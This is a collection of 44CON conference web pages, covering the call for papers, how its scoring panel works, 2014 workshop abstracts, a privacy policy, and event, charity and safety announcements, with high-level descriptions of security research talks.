          44CON consists of 2 dedicated speaking tracks, a dedicated workshop track and combined speaking/workshop track over the two days. Talks range from softer subjects in areas such as governance, law and policy through to reverse engineering, exploitation, tooling and abuse of weird machines. We also have an open evening freely accessible to all (but with pre-registration) on the Wednesday evening before the main event.

          Talks are 45 minutes long, while workshops are 60-120 minutes in length. All submissions are welcome but some useful guidance on particular topics of interest can be found at the CFP submission system.

          As usual, speakers from outside of Fulham, Putney or London Underground Zone 1 will have travel reimbursed. We’ll provide two nights accommodation for speakers or workshop presenters with more than an hour’s travel to a mainline London rail station. We’ll bump that to 3 nights accommodation for any accepted speaker providing a talk and a workshop.

          If you’re interested in submitting something, we highly recommend reading last year’s How To Game The 44CON CFP blog post.

          The CFP closes on Monday 30th April 2018 at 23:59pm UTC. We’ll start notifying speakers by the 4th of June and announce our first round of accepted speakers on the 6th of June at BSides London. Full details of dates can be found on the CFP system.

          #####EOF##### How to game the 44CON CFP – 44CON

          How to game the 44CON CFP

          Every year 44CON has a Call For Papers (CFP). The CFP is run by a panel of about 10 people from various parts of the industry, predominantly based in the UK. The process and technologies used have changed over the years, most notably last year when we replaced our existing bespoke CFP system with HotCRP and implemented a weighted average scoring mechanism based on HotCRP voting results.

          TL;DR – I want to speak at 44CON

          Ok, then do these things to boost your chances:

          1. Submit a workshop with your talk
          2. Make it clear where else you’ve submitted and/or might/will submit
          3. Include links to other talks you’ve done, video if you have it
          4. Get your talk in early for a better chance of scoring higher
          5. Be enthusiastic, tell us of any boundaries, problems or needs, and work with us, not against us

          Understanding how the CFP works

          The CFP is opened on a particular date for submissions. Everyone speaking in Track 1 or 2 must go through the CFP process. Track 3 (which is sometimes used for workshops) is a little more fluid, for reasons I’ll discuss later.

          Scoring and voting

          Scoring is as much an art as science, but you can improve your chances of speaking at 44CON.

          Our panel votes on and scores talks out of 5, normally in several tranches. It varies by individual and not everyone votes on every talk. People provide comments and feedback, which we pass onto those submitting on request. On average we get between 200-400 submissions a year.

          When the CFP is due to close, we push panel members along to review and score submissions, particularly if they haven’t yet been voted on.

          Once voting is complete, we divide the sum of scores from each voter by the number of voters to get an average, with an option for discussion under certain circumstances that can weight a score by up to + or – 0.5.

          UK submissions normally get up-voted (with some exceptions, see below), and in the selection rounds there’s a strong bias towards UK-based speakers over non-UK-based speakers with identical scores, unless the non-UK-based speaker’s talk is exceptional in other ways. This doesn’t mean that your talk will be rejected if you’re not based in or from the UK. Non-UK based speakers make up the majority of our speakers, but there is definitely a small “home bias” amongst the panel members based in the UK.

          Why does it take so long to find out if I’m accepted?

          If you’re not sure what’s happening, contact us and we’ll give you an update.

          Once we have the results we look to fill a specific number of slots, which varies each year. Acceptance messages are sent out in tranches, and when people return the speaker agreement, they’re confirmed. We normally send rejections for very low scoring talks, but there’s a glut of talks usually falling between 3.5-4.0, where they might be accepted if others scoring higher can’t make it.

          If you’ve scored an average of 5.0, you’re pretty much guaranteed a slot and we’ll get in touch straight away. The bulk of submissions tend to hover around a score of 3-4, and 4.5 is normally the cut-off point for the first tranche of accepts. We then wait till the first tranche come back, or if we get no response, chase them up twice before moving on.

          For the slots that free up, we move down the list, ensuring those who scored highest get picked first. Once we’ve filled up tracks 1 and 2, we move on to track 3.

          After the first round of talk triage, cut-off tends to happen around average scores of 4.25 – 4.0/5. What this means is that there are a lot of good talks that just don’t get accepted at 44CON because we don’t have the space to support them, even with a third track. More often than not a talk or workshop rejection from 44CON does not mean it sucks. Ask for feedback and we’ll share what we can.

          Wait, isn’t 44CON a two-track conference?

          All speakers dress like this when preparing submissions.

          Yes and no. For several years we’ve run a hidden track under various names. This is because we’ve wanted to give our backup speakers a chance to speak if someone drops out, but we don’t want to risk slots emptying on the main tracks. Inevitably people drop out along the way, people who are allocated to track 3 move onto the main tracks and this leaves gaps that we have the option to fill.

          Sometimes we’ll look back at the talks list and look to offer a spot to someone on the list, however sometimes it’s easier to go to people we know are definitely coming and see if they have something. This is a completely arbitrary decision affecting two slots a year at most, and more often than not, 10-20 people want the slots. We generally operate on a first come, first serve basis.

          Hacking the process

          Now you know how the process works, let’s look at how you can subvert it to ensure your talk has the best chance of scoring high. Each voter on the panel is different, but there are certain things that, on average, will result in you being more favourably considered.

          Submit both Talks and Workshops

          We have 2-3 tracks to fill with talks, and get on average 200-400 submissions a year. We get fewer than 20 workshop submissions a year. Workshops are 2 hours long and come with an extra night’s accommodation when talks are also submitted.

          If you want to maximise your chances of speaking at 44CON, submit a workshop.

          Workshops are typically more intimate affairs with room for about 30-50 people sitting down, although we have had workshops with 100 people. If you’re not sure what to do in a workshop, imagine that your main talk is about the theory, then try a play-along walkthrough of how to do it in practice.

          Every year we’ve run a formal CFP process, we’ve treated people who submit workshops far more favourably than people who submit talks alone. Even if your workshop is unrelated to your talk, both are likely to be up-voted considerably.

          I cannot stress this enough. If you want to maximise your chances of speaking at 44CON, submit a workshop.

          This only works if you submit your workshop separately to your talk. People submitting a talk and workshop in one don’t get the voting benefit separate talk and workshop submissions do. Finally, if you’re only prepared to come if your talk is accepted, please say so on both submissions.

          Tell us where else your talk has been submitted

          44CON is usually among the first events in the calendar after BlackHat and DefCon. Everyone wants to speak in Vegas, we understand that. Some people score BlackHat and DefCon talks slightly lower in order to give preference to newer talks, some don’t. It’s down to the panel. If you don’t tell us you’re talking at BlackHat or Defcon, and we find out by checking the site, panel members will remember next year and it may affect future submissions.

          If you’re doing your reveal in Vegas, focus on your process at 44CON.

          Not everyone in the UK can go to BlackHat or Defcon, so there’s not a massive deal in your talk being done in the UK afterwards. We do need to know what will be different. It takes a lot of effort to deliver a big Vegas talk, and making something different may seem like an awful lot of effort, but there’s an easy workaround that normally gets big bounces.

          If you’re doing your reveal in Vegas, focus on your process at 44CON. If you spent 6 months trying to reverse engineer and compile code for an arcane architecture, we want to know how you went about it. We also appreciate failures as much as successes. Some of our better talks have been talks about how people have failed and what they learned.

          If your talk is 70% different to your Vegas talk, say so. If it’s 50%, say so. If it’s 30%, say so. If you say so, and it’s not, then reviewers will know next year.

          Show us your other talks

          A picture speaks a thousand words, but a video of your talk lets the panel look at the type of speaker you are, how you approach your talks, and gives us an idea of where we think you might fit in best.

          Show us your other talks, even if you're a rockstar.
          Showing us your other talks helps us fit you in.

          This is an especially powerful tool for speakers coming from countries where English is a second language. All of our talks are delivered in English. We have some great speakers from across Europe, India and even China, and we want to keep the focus on the content, not on the way it’s conveyed.

          It can be pretty scary delivering a talk in a second or third language, and it’s useful to see you speak, both to reassure voters when you’re delivering a talk, and to determine what help we might be able to offer if your research is brilliant, but you struggle with the language.

          Even if you’re a native English speaker, throwing us a link to earlier talks lets us work out where and when we can put you. We often put more energetic speakers on in the afternoon for example.

          Submit your talks early in the process

          Most of the panel vote in several stages. Almost everyone votes for the first submissions coming in, and slowly dribble off after a while. At several points while the CFP is open, more people will vote, but because there are fewer talks to vote on, we’ve noticed that early talks score higher on average than those submitted later.

          The more votes you get, the better the chance of bringing your voting average up and the better the chance of your talk being accepted. Submitting early gets you more (and often higher) voting scores.

          Remember It’s A Two-Way Street

          We completely understand how much of an effort you put in to come to speak at 44CON. Many of the crew talk at conferences themselves, and understand that you’re giving your time for free to go and speak at an event. That’s why we try to make the talk as cost neutral as possible for you to come and present. When people interact more with the event, and try to get involved, they’re generally more likely to have more positive responses.

          There are certain speakers who come back to 44CON regularly such as Jerry Gamblin, Saumil Shah and Joe Fitzpatrick amongst others, all of whom make really strong efforts to interact with the crew and those attending. If, in your submission, you come across like you’re treating 44CON as just another con to shop the same talk around and disappear, you’re probably going to score lower than someone who comes across as though they really want to be there.

          Coping with rejection

          Our scoring method is not without its faults. No scoring system is perfect, and we’ve had to break bad news to big names as well as people with talks some of us thought were brilliant fits for the event.

          If you don't hear from us straightaway, wait or contact us, don't assume your talk was rejected.
          If your talk was rejected, it’s not an indictment of you or your talk.

          To help you deal with the sting of rejection, remember this:

          1. Your talk not being accepted at 44CON does not mean we thought it was bad.
          2. You absolutely have the right to ask for feedback. It might take a while depending on when you ask, but Steve will personally write back to you with as much detail as he can provide.
          3. We’re all here to learn. If you think that we’ve made a mistake, or have ideas on how we can improve (beyond “accepting my awesome talk next time, dumbasses”), then we want to know.

          Most importantly, your talk not being accepted does not mean we don’t want you to come and enjoy 44CON. We absolutely do want you to come, and will happily offer you a discount on a ticket as a thank you for submitting.

          We want everyone to have a good time at 44CON. If you have any special needs or requests, from assistance with disabilities to being able to bring your kid(s) along just let us know. Unless it’s something we absolutely cannot accommodate, it will have no bearing on your submission’s consideration.



          44CON 2014 Workshops

          Some of the following workshops have specific requirements for items that attendees should bring along, full details can be found here on the requirements page.

          Advanced Excel Hacking

          Presented By: Didier Stevens

          This is a workshop on hacking Excel on Windows without exploits.

          Visual Basic for Applications (VBA) is a powerful programming language, more powerful than VBScript, because it has access to the Windows API. What I teach in this workshop is applicable to all applications with VBA support (Word, Powerpoint, AutoCAD, …), but I choose Excel because of its prevalence and its tabular GUI that is particularly suited for inputting and outputting data.

          I illustrate 2 major hacking techniques on Excel: pure VBA and VBA mixed with special shellcode and DLLs.


          Creating A Security Awareness Program

          Presented By: Valerie Thomas

          Creating a security awareness program from scratch is no easy task. If you’re responsible for building a new program, modifying an existing program, or just want some educational resources for friends and family this workshop is for you. We’ll cover the basic components of an awareness program, training for budgets large and small, and bringing it all together to create a program that’s right for you.


          The 100 Question InfoSec Quiz

          Presented By: Jerry Gamblin

          Do you love InfoSec? Do you like Trivia Questions? Do you like naturally ebullient Americans? If so this is the workshop for you. This will take place on the Wednesday Evening of 10th September.


          No More Neck Beards: An Introduction to abusing the Android Kernel

          Presented By: Josh Thomas

          The Android / Linux kernel seems to still remain a magical place to a lot of us in the security industry. We understand exploitation fairly well, but when it comes to simple manipulation we find ourselves lost. In this workshop, I am hoping to change that paradigm.

          We will focus on a guided exploration of some interesting and often overlooked portions of the kernel. We will analyze them, understand them, recompile them and see what happens on a real device. The primary focus will be on recreating the NandX project (hiding data on NAND Flash hardware) and Project Burner (manipulating power routing on device internals), but we will also walk through some other peculiar code that can be found hidden deep in the standard source tree.

          The direct goal of this workshop is for all attendees to walk away with a deeper understanding and familiarity of the kernel itself and the ability to recreate and extend my specific kernel research.


          Binary Protocol Analysis with CANAPE

          Presented By: James Forshaw

          CANAPE is an open source network proxy written in .NET. It has been developed to aid in the analysis and exploitation of unknown application network protocols using a similar use case to common HTTP proxies such as Burp or CAT.

          This workshop will go through the basics of analysing an unknown application protocol with hands on training examples. By the end of the workshop candidates should be able to better understand CANAPE’s functionality and be able to apply that to other protocols they come across.


          Incident Handling with CyberCPR

          Presented By: Steve Armstrong & Mike Antcliffe & Ed Tredgett

          In this workshop we will demonstrate the functionality of the new FREE Incident Response tool: Cyber Crisis Planning Room (CyberCPR) (www.crisisplanningroom.com). This new free tool has been designed to support Incident Handling. The tool has been written from the ground up by security cleared Incident Responders; so we added the sorts of features we wanted.


          Playing the 44CON CTF

          Presented By: Tim Pullen

          If you’re interested in playing the 44CON CTF, this is the workshop for you. It will focus on my experience playing (and winning) the last 2 years of 44CON CTF, and give some advice on CTFs in general.

          This will take place on the Wednesday Evening of 10th September


          Switches Get Stitches

          Presented By: Eireann Leverett & Matt Erasmus

          This 2 hour workshop will introduce you to Industrial Ethernet Switches and their vulnerabilities. These are switches used in industrial environments, like substations, factories, refineries, ports, or other homes of industrial automation equipment. In other words, SCADA and ICS switches. You will gain familiarity with the basic usage of these switches, and do some very light traffic analysis and firmware reverse engineering.

          Not only will vulnerabilities be disclosed for the first time (exclusively at 44CON), but the methods of finding those vulnerabilities will be shared. If you have never done any reverse engineering or firmware analysis, this might be a good place to start.

          You will need to be familiar with a Linux command line, and the usage of tools such as Burp and Wireshark. If you are an IDA Pro wizard we welcome your attendance, but we won’t be teaching you anything new. However, we will examine firmware and device embedded webservers with tools such as binwalk, strings, grep, xxd, python, scapy, and compression utilities.

          All vulnerabilities taught/disclosed will be in the default configuration state of the devices. While these vulnerabilities have been responsibly disclosed to the vendors, SCADA/ICS patching in live environments tends to take 1-3 years. So this work will be fresh and useful for your penetration tests in the future.

          You might even find new vulnerabilities with the chance to play with these devices (which are being brought to 44CON for this workshop)!


          ARM Wrestling a Printer – How to Mod Firmware

          Presented By: Michael Jordon

          How secure is encrypted, embedded ARM firmware? This talk discovers how an encrypted firmware image may be hijacked to run custom malware, demonstrated using a Canon printer. This talk will explain the full process, from breaking the encryption, identifying and understanding the flash file format, reverse engineering the binaries, bootloader, compression, and ARM instructions, patching the binary, development of an ARM backdoor, reversing the functionality to steal printed documents and scanned files, and finally rebuilding the firmware to create a malicious image which may be uploaded to the printer. The entire process is carried out without the need for authentication, and this work can be deployed simply by being on the same LAN/WLAN as the printer, or deployed via CSRF in the case of internet connected printers. All the above takes place on an ARM device which has no full OS, no debugger and no console. In the final demo I will show how far you really can take a printer.



          44CON Privacy Policy

          This is a very boring document, but don’t let it put you off.

          TL;DR – We consider your privacy rights to be human rights wherever in the world you live. We take steps to secure the information we collect, and only use or share it under specific circumstances. If you ever want to talk to us about it, or request we do something with data held about you, just talk to us and we’ll do our best. If you have any questions, please contact dpo@44con.com.

          Sense/Net Ltd (“44CON”) Privacy Policy

          We consider privacy rights to be fundamental human rights. Regardless of where you live, you have the right:

          • to access your information and to receive information about its use.
          • to have your information corrected and/or completed.
          • to have your information deleted.
          • to restrict the use of your information.
          • to receive your information in a portable format.
          • to object to the use of your information.
          • to withdraw your consent to the use of your information.
          • to complain to a supervisory authority.

          When exercising these rights, there may be consequences affecting our ability to deliver access to the event. We’ll try to warn you of this at the time, but will carry out your request if you confirm you wish to proceed after being warned.

          Data Protection Officer: Marizel Fourie

          To exercise or query your information rights, please contact our Data Protection Officer at dpo@44con.com.

          Data collected

          We collect the following pieces of information:

          • We use cookies on websites for analytics, marketing and support.
          • Name, Contact information, IP address, cookie information, device information, geographical information from IP address and time of access through web and host analytics and logs.
          • Email address and any information (for example, food preferences) you provide when buying a ticket or contacting us via email.
          • Country of origin, Email address, name and any information you provide when using our CFP system.

          Your information is shared with the following third-parties:

          • Companies sharing directors with Sense/Net Ltd (Currently Alien8 Systems Ltd, Cortex Insight Ltd, Mandalorian Security Services Ltd and Raw Hex Ltd). Sense/Net Ltd doesn’t employ anyone. Instead, people employed by these companies support Sense/Net’s operations. The information is shared in order to support events such as 44CON.
          • Eventbrite (for ticketing), Google (mail, groupware and analytics), Hootsuite (Social media), Mailchimp (44con-announce list), Slack (internal chat), Shopify (Ticket and swag sales), Youtube and Vimeo (Talk and Workshop videos), Sched (Scheduling – speaker details), SagePay (for payment processing).
          • We also use other platforms such as Sched for scheduling, YouTube and Vimeo for video but your information is not provided by us, unless you’re the subject of the content (e.g. a speaker).
          • Volunteers working on events (e.g. our CFP panel and where relevant, ops leads). This is provided on a need-to-know basis and strictly for the purposes of making events run smoothly. Data is shared with volunteers on an individual, not company basis.

          Your information is not shared by us:

          • With sponsors, friends of 44CON or partners except as shown above or where specific explicit consent is granted (e.g. you asked a crew member to pass your email address to a sponsor).

          On consent

          When you send us information, you are deemed to have given us the consent to process it in accordance with our policy and the laws of England and Wales.

          You may withdraw consent by emailing our DPO in the first instance, or using function-specific features such as the unsubscribe button in every 44CON-announce list email, or their equivalents.

          Use of collected data

          How we use your information:

          • Administrative and business purposes, including but not limited to processing orders and refunds, travel bookings, contacting you with information about the event or those connected to it.
          • In order to meet contractual obligations.
          • Improving our systems and marketing through the use of analytics.
          • Advertising goods and services.
          • To fulfil legal obligations under the laws of England and Wales.

          How long we retain it for (in order of importance from most to least):

          • As long as we need it in order to comply with the laws of England and Wales (e.g. for tax purposes).
          • As long as we need it in order to perform the functions above.
          • As long as consent is not withdrawn (e.g. our announce list).

          How we secure your information:

          • We use Google’s G Suite to store the majority of our data used for operating the event, which allows us (amongst other things) to track who downloaded copies of it.
          • We use appropriate encryption methods (TLS, PGP, drive crypto) to protect personal data at endpoints and in transit.
          • We try to avoid collecting information where practical.

          Transfers of information outside of the EU:

          As an international event, some of our volunteers are based in and outside of the EU. Where we transfer information outside the EU, we’ll ensure appropriate safeguards are in place, for example our non-EU suppliers such as Google have self-certified as compliant with the EU-US privacy shield.

          Sensitive Personal Information

          We do not knowingly or intentionally collect what is commonly referred to as “sensitive personal information”. Please do not submit sensitive personal information about you to us.

          #####EOF##### stevelord – Page 2 – 44CON

          44CON Training Goes Quarterly

          We’ve offered training courses around 44CON for a long time. We provide a mix of high-end focused courses on everything from exploiting Windows Kernel bugs to broader, more generalist courses on web application security and security monitoring. From this year onwards, we’re expanding this to a quarterly schedule.

          That’s right, you no longer have to wait a year to sit a high quality training course!

          Our 12 month schedule is available here, and you can check out our first courses scheduled for the 11th and 12th of March 2019:

          Mastering Container Security – Rory McCune, NCC Group
          Malware Reverse Engineering – Joxean Koret

          Both courses are two days long and cost £1300 inc. VAT. When you book online remember to keep the 13th of March free for access to an exclusive, invite-only event.

          If you’d like to offer a high-end course in London, get in touch.

          Making Britain a Better Place For The Most Vulnerable

          “You measure the degree of civilization of a society by how it treats its weakest members.”

          This quote has been attributed in various forms to historical figures from Pope John Paul to Dostoevsky, Churchill and even Gandhi. It is a commonly held British value that we should treat others how we’d wish to be treated.

          The UK’s food poverty crisis has been getting worse for the best part of a decade. From austerity to universal credit, by that quote above our society’s score is dropping like a stone. This year we’ve come together to support the Trussell Trust and Hammersmith & Fulham Foodbank. It’s an initiative we’re calling Hacking For Foodbanks, that will continue beyond 44CON. While it’s been founded by 44CON crew, we want it to be bigger and separate to 44CON. Food poverty is a national problem and we need your help to help those that need it the most. Hacking For Foodbanks has a 4-point plan to make an impact on UK food poverty through cybersecurity and the tech industry, which you can read more about here.

          Help us raise money at 44CON

          We want you to bring your (working) retro, old and cool tech that you’re willing to part with as part of a bring and buy sale operated by Hammersmith & Fulham Foodbank and the Trussell Trust. We’ll provide tags so you can set a suggested price for your donated goods, and people can come along to the Trussell Trust table and put in an offer. Got a reasonable-sized retro-battlestation like a Rubber keyed spectrum? Fantastic! WPA injection wifi cards and Hayes serial modems? Super! We’re ideally looking for bric a brac others would want to buy at £5-£50 in suggested value.

          Anything that doesn’t get sold can be picked up by the people that dropped it off, or alternatively we’ll donate the kit to similar activities at other UK events.

          We’re also offering people the opportunity to make a donation to the initiative both at the event and when they buy a ticket, or register for the free open evening.

          All funds raised will be split 50/50 between Hammersmith & Fulham Foodbank and the Trussell Trust, in order to support foodbank activity in Fulham and across the UK.

          Get involved

          We’re also looking for people to take part in our mentoring scheme, to be piloted in early 2019. In particular we want people from non-technical as well as technical fields, particularly where a university degree isn’t required. We want to raise awareness for foodbank users that there are career opportunities out there, from sales and recruiting to technical jobs. We want to bring these opportunities to interested and able foodbank users and help them when they need a hand the most. Most important of all, we want to eliminate UK food poverty, one family at a time. If you’d like to help, wherever you are just drop us an email.

          Building A Permanent Community At 44CON

          44CON’s always been the kind of place where you turn up, hang out with friends old and new, get your head bent then go home and get on with your life. But we want to do more than that. We’re building a permanent community for everyone, whether you come to 44CON or not. We’re also mostly old(er Steve, damnit! – A) and riddled with nostalgia. Instead of using Snapbook, or Slickchat or whatever the cool kids use, we thought we’d build a traditional Bulletin Board System and drag it kicking and screaming into the modern age.

          To say this was a bad idea was an understatement. Our first attempt used a hodge-podge of Docker, a piece of DOS-based software last updated before the average attendee was born and one instance of a DOS emulator per connection. It worked, but was telnet only (thanks to the joys of serial emulation) and was very, very unstable.

          In the end we settled on a modern BBS implementation that has a learning curve almost as steep as Radare2, but allows us to do cool modern things, like provide access over SSH and HTTPS. Originally we worked on supporting older platforms like the BBC Micro, C64 and ZX Spectrum, but everything old struggled with newer software, and everything new struggled with older software.

          Finally, we have something we think you’re going to love. Registration will open on the 12th of September. May we present the official 44CON rumour mill, Juicy HQ:


          For those of you who’ve never used a BBS before, the first thing you need to know is that you apply for an account (register). Once you’ve filled in a form, you’ll be taken to the new scan screen. This is to check for updates since you last logged on. There are public and private message areas, file uploads (check out our collection of classic British hacking textfiles, or our PoC||GTFO archive) and you can play multiplayer old-school BBS games courtesy of our DoorParty setup. If things seem a little less interactive, remember that BBSes were typically built to serve very few, if any concurrent users, and most content was downloaded in batches for later offline use.


          Most British people never really got to use dial-in BBSes back in the day due to BT’s monopoly and pricing, although Prestel and Micronet had some popularity. There was one information system that every British person had access to, which was Teletext. On the BBC, we had Ceefax. So we built our BBS around a Ceefax theme, although you might spot the odd reference to Teletext classics such as Bamboozle and even Digitiser. And yes, all of this is accessible in a web browser.


          Although Juicy HQ is the official 44CON BBS, it’ll be open to everyone from the 12th of September. Whether you’ve been to 44CON or not, live in the UK or not, or if you’ve never been to a conference before, all are welcome providing Wheaton’s law is followed at all times.


          We’re still refining Juicy HQ in preparation for launch, but we’re making sure there’s plenty of easter eggs for you to find. If you’re interested in beta testing the BBS, give Steve a shout on twitter or mastodon and he’ll hook you up.

          What To Expect On Thursday Night

          44CON’s a bit different to some other cons in that we tend to run our own Thursday night entertainment instead of a traditional sponsor party. Sponsors and others are welcome to run their own events if they prefer, and indeed, this year some are. Last year was a little quiet, mostly due to Steve not being well enough to plan things.

          If you’ve never been to a 44CON, or if last year was your first, you might not expect much, but this year we have a lot going on.

          First of all, the biggest of big big shout outs go to our dear friends and Gold sponsors, HackerOne, without whom this night wouldn’t happen. HackerOne are sponsoring the entire evening, so make sure you thank them for helping out. We’ll have complimentary food and drinks from Gin O’Clock onwards courtesy of our Gin O’Clock sponsors Crowdfense, up till 19:00, and at various points and places in the evening from 19:50 onwards courtesy of HackerOne. As well as a selection of alcoholic drinks, we’ll also have a fantastic Mint and Elderflower Fizz mocktail and soft drinks for those who want to keep things light.

          The evening session starts at 19:00 with Pwning the 44CON Nerf Gun, by Chris Wade and Dave Lodge of PenTest Partners. This is no ordinary stunt hack talk. The Nerf Terrascout is pretty well put together for a toy tank, and it took the PTP guys a heck of a lot of effort in reversing proprietary RF protocols, manipulating the SPI bus and all kinds of wacky techniques, all to hijack the controller in real-time so they can shoot Steve. This is rather odd, as it’s absolutely not going to happen. The crew won’t let Steve get shot…. honest!

          Nicky Bloor will be running a two-hour workshop from 20:00 on Diving Deep into Deserialization, starting with an overview, then diving through exploit and gadget chains into a CTF-style VM for you to play along with (so don’t forget your laptop). Expect this to bend your head a little, but you’ll come out of the other side made of steel.

          Looking for something more blue team than red? From 20:00, Philippe Arteau will run a two-hour workshop on Machine Learning with the Orange data visualization, machine learning and data mining toolkit. His workshop, Orange is the new Hack, is essential for anyone conducting triage and will take you through implementing vulnerability classification at scale. The same skillset can be applied to other contexts such as malware classification, system alert classification and vulnerability management.

          While the workshops are going on, we’ll have Duckies Den in Track 1 from 20:00. Pitch your ideas to our panel of industry duckies, who’ll award beer tokens accordingly. Our sponsors will also get short pitch slots… but the audience get the beers. This year’s theme for our attendees is “Zany cybersecurity ideas that don’t exist, and probably shouldn’t”. Prizes will be awarded for:

          • Best billed idea
          • Most lame duck pitch
          • Most quackers concept

          Could your idea be the nest big thing? Which pitches will fly, and which will sink without a trace? Waddle our panel of duckies take under their wing? Will our sponsors earn a feather in their cap, or will they cry fowl play? It’s not just an eggscuse for duck puns, but we’re sure avian will have a good time!

          If it’s all a bit too much and you want to veg out in front of a film, we’ll be screening all-time classic The Big Lebowski in the coffee area from 20:00. Chill out on the sofas, grab some snacks and see what happens when you meet a stranger in the alps. If you don’t like The Big Lebowski, well, that’s just your opinion, man.

          Last year we had Linux Kernel poetry and Yoga. This year we’re looking for lightning talks with a twist in our Lightning Talk Poetry Slam from 22:00 in Track 1. Slots are 5-15 minutes long, and should feature, either in part or in whole, some form of poetry. Haikus, Limericks and epic Rap battles are most welcome. Sign up at the front desk, then come up, either take a shot of Sourz or try a British snack and SHOW US WHAT U GOT.

          On Hotel Accommodation And Safety

          First and foremost, if you’re attending 44CON, please add this phone number to your contacts list, under “44CON”. It’s our at-event emergency crew contact number:

          +44 (0)7955 376 729

          Recent events in Las Vegas as a result of policy changes following the Mandalay Bay shooting seriously affected some of our attendees visiting the city for conferences in early August. We watched from a distance in abject horror as people routinely had their privacy and safety compromised by aggressive security teams demanding entry to rooms and confiscating soldering irons and lockpicks, some of which we understand haven’t been returned to their owners.

          While we completely understand the need to beef up security in the shadow of yet another mass shooting in America, the horrific stories that unfolded on twitter made us ask ourselves what we were doing to ensure that such invasions of safety and privacy don’t happen here.

          To that end, we’ve done two things:

          1. We’ve asked the ILEC’s attached hotel under what terms they’ll enter rooms booked there.
          2. We’ve set up an emergency contact number you can call to reach the crew at any time during the event.

          In the UK there are reasons under which your hotel room can be forcefully entered, but generally it shouldn’t need to happen unless your stay is longer than a few days and you’ve left the Do Not Disturb tag on your door. This is partly to check that you’re still alive, and also to check you haven’t trashed the hotel room. From the ILEC:

          We do not access guests rooms apart from cleaning. If the Do not disturb sign is displayed up to 3 days we do not enter but after that we have to check. Initially we would ring the room and if the guest answers we would ask to go and see the room if it is inacceptable[sic] conditions ( as in damages).

          If there is a fire evacuation the fire marshals will go floor by floor and knock and open the rooms for people to evacuate as they can be asleep.

          The only other reason for someone to enter the room by force would be if the police or fire service needed to enter in an emergency.

          The author of this post is a man, but the 44CON crew are a mix of men and women. If you’re struggling to see why this is primarily a safety rather than privacy issue, I think Joe Fitz summed things up best in this twitter thread:

          “I sympathize with @maddiestone and @k8em0 ‘s experiences but realize I can’t possibly know how terrified they probably felt.”

          Once again, that emergency crew number is:

          +44 (0)7955 376 729

          If you’re attending 44CON, please add this number to your contacts. It’ll only be active during the event, but someone will have the phone 24×7. Please don’t abuse this number, as it may block the line for someone who needs it.

          Fundamentally, your safety is the most important thing to us. If we can’t get that right, nothing else matters. While we don’t expect problems, should anything happen that could compromise your safety:

          1. If you’re in your room and something is happening outside, make sure the room is locked. Do not let anyone into your room if you don’t want to.
          2. Dial reception on the in-room phone and tell them what’s happening, and what you need them to do.
          3. Let us know something’s happened via email so we can track it, regardless of whether it’s been resolved.
          4. If it’s unresolved, or you feel your safety is being threatened then call +44 (0)7955 376 729. We’ll sort things out from there.
          5. In case you need it, please remember that the emergency services number is 999 in the UK, not 911. 112 will also work.

          We don’t expect anyone to need this, but if you do, we’ll do our best to keep you safe.

           

          Introducing 44CON’s House Rules

          44CON was born out of a private event that Adrian and I used to occasionally get involved in organising. It was a close-knit group of people featuring deeply opinionated and often spectacularly drunk people who somehow mostly got along.

          As 44CON grew, more people outside that group attended. The new people didn’t know about our Overton window. These people paid good money for a good time, but were new to our community and we hadn’t provided guidance on what was acceptable behaviour, or how we handle concerns.

          An event with talks about exploiting human and computer trust relationships tends towards some attendees holding unusual views about acceptable behaviour. To make things easier for everyone, we introduced Wheaton’s Law. For those that don’t know, it’s fairly easy to take on board:

          “Don’t be a dick.”

          For a long time “Don’t be a dick” was the only rule we had. Every year we’d review it, and every year it would stay.

          We have had people breach the rule. We’ve had and investigated complaints. We stand by Wheaton’s law as it’s stood by us. What we haven’t done is properly track complaint resolution, and we hadn’t told people how to raise concerns. That’s why we’ve launched our House Rules. They’re not going to be perfect, but it’s a start.

          The House Rules are simply an expansion of Wheaton’s Law. They set expectations, a reporting process and circumstances under which we’ll eject someone, along with a reminder that the laws of England and Wales may not match your own at home.

          We’ve integrated feedback from event organisers up and down the country, and we’re fully open to suggestions on how to improve them for next year. To be clear, there’s no change in our expectations from previous years, only in how we communicate them.

          If you’re coming to 44CON you’ll see the house rules in your brochure or you can read them now. Please take a moment to read them, as they apply to everyone. If you have any questions, suggestions or comments, use the email address on the House rules page before the event, or follow the procedure to report a concern once you’re there.

          We want everyone to have a good time, regardless of preferred text editor, open source licensing beliefs or i/o port configuration. We hope you’ll join us and keep making 44CON a great place for everyone.

          44CON 2018 CFP Is Open!

          We’re really excited to open our Call For Papers for 44CON 2018. We’re looking forward to seeing all of your submissions on our shiny new CFP system, which promises to be far less painful than the old one.

          44CON consists of 2 dedicated speaking tracks, a dedicated workshop track and combined speaking/workshop track over the two days. Talks range from softer subjects in areas such as governance, law and policy through to reverse engineering, exploitation, tooling and abuse of weird machines. We also have an open evening freely accessible to all (but with pre-registration) on the Wednesday evening before the main event.

          Talks are 45 minutes long, while workshops are 60-120 minutes in length. All submissions are welcome but some useful guidance on particular topics of interest can be found at the CFP submission system.

          As usual, speakers from outside of Fulham, Putney or London Underground Zone 1 will have travel reimbursed. We’ll provide two nights accommodation for speakers or workshop presenters with more than an hour’s travel to a mainline London rail station. We’ll bump that to 3 nights accommodation for any accepted speaker providing a talk and a workshop.

          If you’re interested in submitting something, we highly recommend reading last year’s How To Game The 44CON CFP blog post.

          The CFP closes on Monday 30th April 2018 at 23:59pm UTC. We’ll start notifying speakers by the 4th of June and announce our first round of accepted speakers on the 6th of June at BSides London. Full details of dates can be found on the CFP system.

          The 44CON CFP just closed. You won’t believe what happens next.

          Edit: This post was originally written just after the CFP closed in 2017. If you’re here from a CFP-related link, don’t assume this year’s CFP is closed. If you’re not sure, check the CFP system for the latest info.

          Each year 44CON attracts between 100-200 submissions. Some of these are excellent talks, some are average and some are, well, let’s just say that some are below average. In this blog post I’ll try to go through what happens when the CFP closes and to help you answer the immortal question, “Has my talk been accepted/rejected?”

          Along the way I’ll announce our first accepts, and most importantly explain the why of our CFP process.

          Continue reading “The 44CON CFP just closed. You won’t believe what happens next.”

          44CON 2016 – Another year done!

          Well that’s it for another year, our sixth 44CON has come to an end!

          We here at 44CON would like to take the opportunity to thank all of our sponsors, speakers, attendees and crew for making this year’s 44CON the most mellow yet. If you didn’t manage to catch all of the talks the slides should be available soon so make sure you keep a look out for them. You can also still pre-order access to the videos in our shop.

          We know many of you are fans of good coffee so Antipode sent us over some stats:

          • 13kgs Espresso
          • 24 litres Cold Brew!!!
          • 12 litres filter coffee
          • 40 litres of milk.

